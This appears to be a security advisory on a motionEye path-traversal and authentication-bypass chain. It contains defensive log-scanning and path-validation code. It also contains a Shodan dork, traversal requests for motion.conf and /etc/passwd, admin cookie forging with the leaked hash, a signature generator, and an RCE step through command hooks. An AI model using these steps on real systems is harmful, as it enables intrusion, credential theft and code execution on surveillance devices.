motionEye, Partial Authentication Bypass / Path Traversal, CVE-2026-31978, CVE-2026-32315, CVE-2026-46488 (Critical) -DC-Jun2026-600


How the Mentioned CVEs Work

The vulnerability chain in motionEye combines three distinct weaknesses to achieve unauthenticated remote code execution.
First, CVE-2026-31978 enables arbitrary file read via path traversal. The `get_media_preview()` function in `mediafiles.py` fails to validate `..` sequences in the `filename` parameter, unlike the `get_media_content()` function, which does perform this check. Tornado's URL router does not normalize `%2F`-encoded slashes, so a raw `../` reaches `os.path.join()` unchanged. This allows an attacker to read any file on the filesystem that the motionEye process can read.
Second, CVE-2026-32315 exposes the admin password hash via world-readable configuration files. The file `/etc/motioneye/motion.conf` is created with `644` permissions, making it readable by any local user. This file contains the admin password hash in the `@admin_password` field.
Third, CVE-2026-46488 allows authentication using only the password hash. The application accepts user-supplied cookie values containing a username and a password-hash-derived value as sufficient authentication material. The signature check in `base.py` accepts signatures computed using either the raw admin password or its SHA1 hash. Since the hash from the config file is accepted directly as a valid signing key, no cracking is required.
When `@normal_password` is empty (the default configuration), any request without a `_username` parameter is silently granted `normal` user access. This makes the path traversal endpoint fully unauthenticated. An attacker can read the config file, extract the admin hash, use it to forge admin API requests, and achieve full system compromise.
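As an added detection example (not code from the advisory or from motionEye), the following scans web-server access-log lines for the two request shapes described above: an absolute filename after `playback/` or `preview/`, and `%2F`-encoded `..` components, additionally flagging requests that carry no `_username` and would therefore be served as the `normal` user when that password is empty. The log lines are constructed for the example.

```python
import re
import urllib.parse

# Media handlers named in the advisory: /<picture|movie>/<camera>/<preview|playback>/<filename>
_MEDIA_RE = re.compile(
    r'^/(?:picture|movie)/\d+/(?:preview|playback)/(?P<name>[^?]*)(?:\?(?P<query>.*))?$')
# Minimal combined-log parser: client address and the request target
_LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

def _fully_decode(s, limit=3):
    """Percent-decode until stable (bounded), so %2F and %252F variants both become '/'."""
    for _ in range(limit):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify_request(target):
    """Return a list of findings for one request target; empty means nothing suspicious."""
    m = _MEDIA_RE.match(target)
    if not m:
        return []
    name = _fully_decode(m.group('name')).replace('\\', '/')
    findings = []
    if name.startswith('/'):
        findings.append('absolute-path')        # playback//etc/... style (CVE-2026-31978)
    if '..' in name.split('/'):
        findings.append('dot-dot-traversal')    # preview/..%2F..%2F... style (CVE-2026-31978)
    if findings and '_username' not in urllib.parse.parse_qs(m.group('query') or ''):
        findings.append('no-_username')         # served as `normal` user if that password is empty
    return findings

def scan_log(lines):
    """Return (client, target, findings) for every suspicious line of an access log."""
    hits = []
    for line in lines:
        lm = _LOG_RE.match(line)
        if lm:
            findings = classify_request(lm.group('target'))
            if findings:
                hits.append((lm.group('client'), lm.group('target'), findings))
    return hits

# Constructed sample log lines (not captured from any real instance)
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2026:10:00:01 +0000] "GET /movie/1/playback//etc/motioneye/motion.conf HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Jun/2026:10:00:05 +0000] "GET /picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin&_signature=abc HTTP/1.1" 200 1200',
    '198.51.100.4 - - [23/Jun/2026:10:01:00 +0000] "GET /picture/1/preview/2026-06-23/12-00-00.jpg HTTP/1.1" 200 3400',
]
```

Calling `scan_log(SAMPLE_LOG)` reports the first two lines and ignores the legitimate preview request.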

DailyCVE Form

| Field | Value |
|-|-|
| Platform | motionEye |
| Version | <= 0.43.1b4 |
| Vulnerability | Path Traversal / Auth Bypass |
| Severity | Critical |
| Date | 2026-06-23 |
| Prediction | Fixed in 0.44.0b1 |

What Undercode Say

Shodan dork to find exposed instances:

```
http.favicon.hash:1898775751
```

Read config file (unauthenticated, requires empty normal password):

```
curl --path-as-is -s "http://TARGET:8765/movie/1/playback//etc/motioneye/motion.conf"
```

Extract admin hash from response:

```
@admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db
```

Set cookie to become admin (browser console):

```javascript
document.cookie = "meye_username=admin; path=/";
document.cookie = "meye_password_hash=7b7d55439abccf4ae83047c1af2707e6eb6664db; path=/";
location.reload();
```

Signature generator for authenticated path traversal (Python):

```python
import hashlib
import re
import urllib.parse

# Characters outside this set are replaced with '-' before signing
_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]', re.DOTALL)


def compute_signature(method, path, key=''):
    parts = list(urllib.parse.urlsplit(path))
    # Drop any existing _signature and sort the remaining query parameters by name
    query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != '_signature']
    query.sort(key=lambda q: q[0])
    query = [(n, urllib.parse.quote(v, safe="!'()~")) for (n, v) in query]
    query = '&'.join([(q[0] + '=' + q[1]) for q in query])
    parts[0] = parts[1] = ''  # strip scheme and host
    parts[3] = query
    path = urllib.parse.urlunsplit(parts)
    path = _SIGNATURE_REGEX.sub('-', path)
    key = _SIGNATURE_REGEX.sub('-', key)
    # method:path:body:key, with an empty body for GET
    return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()


path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin'
sig = compute_signature('GET', path)
print(f'curl --path-as-is -s "http://TARGET:8765/{path}&_signature={sig}"')
```

Exploit

Step 1 — Read config file (unauthenticated):

```
GET /movie/1/playback//etc/motioneye/motion.conf HTTP/1.1
Host: target:8765
```

Response contains:

```
@admin_username admin
@admin_password 7b7d55439abccf4ae83047c1af2707e6eb6664db
```

Step 2 — Use hash to become admin (browser console):

```javascript
document.cookie = "meye_username=admin; path=/";
document.cookie = "meye_password_hash=7b7d55439abccf4ae83047c1af2707e6eb6664db; path=/";
location.reload();
```

Step 3 — Achieve RCE via admin config API:

```
POST /config/1/set HTTP/1.1
Content-Type: application/json

{"command_notifications_enabled": true, "command_notifications_exec": "touch /tmp/pwned"}
```

Protection

  1. Upgrade to motionEye 0.44.0b1 or later — applies `0600` mode to `motion.conf` and `camera-.conf` files
  2. Set a normal user password — prevents unauthenticated access to vulnerable endpoints
  3. Validate path traversal — ensure the resolved path stays within `target_dir`; do not override `get_absolute_path` and `validate_absolute_path` to bypass Tornado’s built-in protections
  4. Reject absolute paths in the `filename` parameter
  5. Move `@` metadata lines to a separate configuration file not within any camera’s media path
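As an added example of the path check and the configuration audit described in the list above (illustrative code, not motionEye's own fix), `safe_media_path()` resolves a requested filename under the camera's media directory and refuses absolute names, `..` components and anything that resolves outside that directory, while `audit_motion_conf()` flags a `motion.conf` that is readable beyond its owner or has an empty `@normal_password`. The directory and config text used in the comments are assumed values.

```python
import os
import re
import urllib.parse

def safe_media_path(target_dir, filename):
    """Resolve `filename` under `target_dir`; return the absolute path, or None
    when the request must be refused (protections 3 and 4 above)."""
    # The handler may receive the %2F-encoded form raw, so decode once before checking.
    name = urllib.parse.unquote(filename).replace('\\', '/')
    # Protection 4: an absolute filename makes os.path.join() discard target_dir.
    if os.path.isabs(name):
        return None
    # Explicit '..' components are never legitimate media names; reject before touching the fs.
    if '..' in name.split('/'):
        return None
    root = os.path.realpath(target_dir)
    full = os.path.realpath(os.path.join(root, name))
    # Protection 3: the resolved path (symlinks followed) must stay inside the media directory.
    if os.path.commonpath([root, full]) != root:
        return None
    return full

_NORMAL_PW_RE = re.compile(r'^@normal_password[ \t]*(.*)$', re.MULTILINE)

def audit_motion_conf(mode, conf_text):
    """Protections 1 and 2: flag a readable config file and an empty normal password.
    `mode` is the permission bits of motion.conf as read from os.stat(), e.g. 0o644."""
    findings = []
    if mode & 0o077:
        findings.append('motion.conf readable by group/other; expected 0600')
    m = _NORMAL_PW_RE.search(conf_text)
    if m is None or m.group(1).strip() == '':
        findings.append('@normal_password empty: media endpoints are served unauthenticated')
    return findings
```

For a live check, pass `os.stat('/etc/motioneye/motion.conf').st_mode & 0o777` and the file's contents to `audit_motion_conf()`.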

Impact

  • Privilege escalation from zero credentials to full admin on installations where admin password is set but normal user password is left empty (the default configuration)
  • Arbitrary file read of any file readable by the motionEye process (typically running as the `motion` user, or `root` on motionEyeOS), including `/etc/passwd`, `/etc/shadow` (if permissions allow), SSH keys, and application secrets
  • Full remote code execution — once admin access is obtained, an attacker can inject arbitrary shell commands via motion event hooks (`command_notifications_exec`, `command_storage_exec`, or `web_hook_storage_url`). Commands execute as the motion daemon user
  • Realistic attack surface — common configuration for home surveillance setups where admin password protects settings but camera feeds are left open for household members. Public instances discoverable via Shodan (http.favicon.hash:1898775751)


Sources:

Reported By: github.com